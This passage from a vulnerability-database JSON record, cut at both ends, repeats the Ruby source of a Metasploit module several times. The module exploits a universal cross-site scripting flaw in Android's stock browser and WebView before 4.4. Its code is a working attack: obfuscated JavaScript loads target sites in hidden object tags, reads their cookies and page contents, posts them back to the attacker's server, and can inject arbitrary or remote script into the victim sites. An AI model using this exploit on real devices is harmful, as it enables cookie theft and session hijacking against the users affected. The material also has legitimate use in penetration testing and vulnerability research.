If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-19T13:25:44", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T15:26:34", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-19T15:26:34", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-09T17:46:48", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-09T17:46:48", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform 
(AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-09T19:47:12", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-09T19:47:12", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "6e872c0bb2ab042e21a220e7df9966e5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform 
(AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-24T21:27:18", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-24T21:27:18", "differentElements": ["modified", "published"], "edition": 60}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform 
(AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-24T23:27:42", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310704388", "OPENVAS:1361412562310704387", "OPENVAS:1361412562310843904", "OPENVAS:1361412562310814670", "OPENVAS:1361412562310843903", "OPENVAS:1361412562310875445", "OPENVAS:1361412562310843901"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2D06CECA2192DFF0EED67EAC5413CB11"]}, {"type": "securelist", "idList": ["SECURELIST:067DB0A9978063CEC1E7506882CBB27E"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG"]}], "modified": "2018-09-24T23:27:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = 
{})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = 
JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = 